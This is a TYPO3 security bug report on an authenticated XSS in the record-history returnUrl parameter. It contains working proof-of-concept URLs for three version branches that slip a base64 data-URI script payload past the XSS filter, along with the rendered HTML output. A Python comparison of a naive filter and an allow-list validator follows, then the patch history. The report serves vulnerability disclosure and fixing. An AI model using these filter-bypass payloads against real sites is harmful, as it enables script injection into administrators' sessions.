Bug #68825: XSS in History module (and probably more places)
Status: Closed (100% done)
Description
1. DETAILS
----------
Product: Typo3 CMS
Vendor URL: typo3.org
Type: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')[CWE-79]
Date found: 30/07/2015
Date published: not yet
CVSSv3 Score: 3.5 (AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N)
CVE: Requested
2. AFFECTED VERSIONS
--------------------
Typo3 7.4.0 (latest) and below
Typo3 6.2.14 and below
Typo3 4.5.40 and below
and other older versions may be affected too.
3. VULNERABILITY DETAILS
------------------------
All current Typo3 version branches are vulnerable to an authenticated Cross-Site Scripting vulnerability while processing the "returnUrl" GET parameter within the "Show record history" view. Although an XSS filter is already in place, it can be bypassed by using a data URI carrying a base64-encoded XSS payload.
The payload differs slightly between the vulnerable branches: 6.2.x and 7.4.x need a space after "data:", while 4.5.x doesn't. In the following proofs of concept, the JavaScript <script>alert('XSS')</script> is used as a base64-encoded data URI.
4.5.x Branch:
Payload:
/typo3/show_rechis.php?returnUrl=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
Output:
<div class="typo3-fullDoc">
<div id="typo3-docheader">
<div id="typo3-docheader-row1">
<div class="buttonsleft"><div class="buttongroup"><a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=" class="typo3-goBack"><span class="t3-icon t3-icon-actions t3-icon-actions-view t3-icon-view-go-back"> </span></a></div></div>
<div class="buttonsright"></div>
</div>
<div id="typo3-docheader-row2">
<div class="docheader-row2-left"><div class="docheader-csh"><span class="t3-help-link" href="#" data-table="xMOD_csh_corebe" data-field="history_log"><abbr class="t3-help-teaser-icon"><span class="t3-icon t3-icon-actions t3-icon-actions-system t3-icon-system-help-open"> </span></abbr></span></div></div>
<div class="docheader-row2-right"></div>
</div>
</div>
6.2.x Branch:
Payload:
/typo3/show_rechis.php?returnUrl=data: text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
Output:
<form name="settings" action="http://172.18.1.193/typo62/typo3/show_rechis.php?returnUrl=data:%20text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=" method="post"><table><tr><td>Show entries:</td><td><select name="settings[maxSteps]" onChange="document.settings.submit()" style="width:100px"><option value="10"> 10</option><option value="20"> 20</option><option value="50"> 50</option><option value="100"> 100</option><option value="" selected="selected"> ALL</option><option value="marked"> marked</option></select></td></tr><tr><td>Show differences:</td><td><select name="settings[showDiff]" onChange="document.settings.submit()" style="width:100px"><option value="0"> No</option><option value="1" selected="selected"> Inline</option></select></td></tr><tr><td>Show sub elements:</td><td><select name="settings[showSubElements]" onChange="document.settings.submit()" style="width:100px"><option value="0"> No</option><option value="1" selected="selected"> Yes</option></select></td></tr><tr><td>Show inserts/deletes of records:</td><td><select name="settings[showInsertDelete]" onChange="document.settings.submit()" style="width:100px"><option value="0"> No</option><option value="1" selected="selected"> Yes</option></select></td></tr></table></form>
</div>
</div>
</div>
7.4.x Branch:
Payload:
/typo3/index.php?M=record_history&moduleToken=260ab28ad4973d29e0a77d2f799e79ca3028de28&element=tt_content%3A1&returnUrl=&returnUrl=data:%20text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
Output:
<div class="typo3-fullDoc">
<div id="typo3-docheader">
<div class="typo3-docheader-functions">
<div class="left"><span class="t3-help-link" href="#" data-table="xMOD_csh_corebe" data-field="history_log"><abbr class="t3-help-teaser-icon"><span class="t3-icon fa t3-icon fa fa-question-circle"> </span></abbr></span></div>
<div class="right"></div>
</div>
<div class="typo3-docheader-buttons">
<div class="left"><div class="buttongroup"><a href="data: text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=" class="typo3-goBack"><span class="t3-icon fa t3-icon fa fa-angle-double-left"> </span></a></div></div>
<div class="right"></div>
</div>
</div>
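The failure mode above is a prefix check that looks for the literal "data:" while browsers tolerate whitespace around the scheme. The following is an added illustration written for this report, not TYPO3's code and not the referenced patch: a hypothetical prefix filter of the kind a space after "data:" slips past, beside an allow-list validator that normalises the URL the way browsers do before inspecting the scheme. The allowed host example.org and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit

# Browsers drop ASCII tab/newline anywhere in a URL and C0 controls/space at
# either end before parsing, so a validator must do the same first.
_STRIP_ANYWHERE = re.compile(r"[\t\n\r]")
_STRIP_ENDS = re.compile(r"^[\x00-\x20]+|[\x00-\x20]+$")


def browser_normalize(url: str) -> str:
    """Apply the whitespace/control stripping a browser performs on input."""
    return _STRIP_ENDS.sub("", _STRIP_ANYWHERE.sub("", url))


def naive_filter(url: str) -> bool:
    """Hypothetical deny-list check (constructed for illustration, not TYPO3's).
    Returns True when the URL is accepted. Because it matches 'data:' glued to
    the media type, 'data: text/html;...' with a space is waved through."""
    lowered = url.lower()
    return not (lowered.startswith("data:text") or lowered.startswith("javascript:"))


def is_safe_return_url(url: str, allowed_hosts=("example.org",)) -> bool:
    """Allow-list check: accept only a same-site absolute path or an http(s)
    URL whose host is on the allow list. Everything else, including any
    data:/javascript: scheme however it is spaced or cased, is rejected."""
    url = browser_normalize(url)
    if not url:
        return False
    parts = urlsplit(url)
    if parts.scheme == "" and parts.netloc == "":
        # Relative reference: must be a rooted path, not protocol-relative
        # ('//host') and without backslashes some browsers treat as slashes.
        return url.startswith("/") and not url.startswith("//") and "\\" not in url
    if parts.scheme.lower() not in ("http", "https"):
        return False
    # urlsplit resolves 'user@host' tricks: hostname is the real target host.
    return parts.hostname in allowed_hosts


# Constructed samples: the two payload shapes from the report plus variants.
PAYLOAD_45 = "data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4="
PAYLOAD_62 = "data: text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4="

if __name__ == "__main__":
    for candidate in (PAYLOAD_45, PAYLOAD_62, "/typo3/index.php?M=record_history"):
        print(f"{candidate[:30]!r:34} naive={naive_filter(candidate)} "
              f"allowlist={is_safe_return_url(candidate)}")
```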
Updated by Gerrit Code Review over 9 years ago
- Status changed from New to Under Review
Patch set 1 for branch master of project Teams/Security/TYPO3v4-Core has been pushed to the review server.
It is available at http://review.typo3.org/42544
Updated by Gerrit Code Review over 9 years ago
Patch set 2 for branch master of project Teams/Security/TYPO3v4-Core has been pushed to the review server.
It is available at http://review.typo3.org/42544
Updated by Gerrit Code Review over 9 years ago
Patch set 3 for branch master of project Teams/Security/TYPO3v4-Core has been pushed to the review server.
It is available at http://review.typo3.org/42544
Updated by Gerrit Code Review about 9 years ago
Patch set 4 for branch master of project Teams/Security/TYPO3v4-Core has been pushed to the review server.
It is available at http://review.typo3.org/42544
Updated by Gerrit Code Review about 9 years ago
Patch set 5 for branch master of project Teams/Security/TYPO3v4-Core has been pushed to the review server.
It is available at http://review.typo3.org/42544
Updated by Gerrit Code Review about 9 years ago
Patch set 1 for branch TYPO3_6-2 of project Teams/Security/TYPO3v4-Core has been pushed to the review server.
It is available at http://review.typo3.org/43117
Updated by Gerrit Code Review about 9 years ago
Patch set 2 for branch TYPO3_6-2 of project Teams/Security/TYPO3v4-Core has been pushed to the review server.
It is available at http://review.typo3.org/43117
Updated by Gerrit Code Review about 9 years ago
Patch set 1 for branch TYPO3_6-2 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at http://review.typo3.org/43121
Updated by Gerrit Code Review about 9 years ago
Patch set 1 for branch master of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at http://review.typo3.org/43122
Updated by Nicole Cordes about 9 years ago
- Status changed from Under Review to Resolved
- % Done changed from 0 to 100
Applied in changeset typo3cms-core:f6d8d3dceaad314ab9f51af76dd955275e57fa3d.
Updated by Helmut Hummel about 9 years ago
- Project changed from 1716 to TYPO3 Core
- Is Regression set to No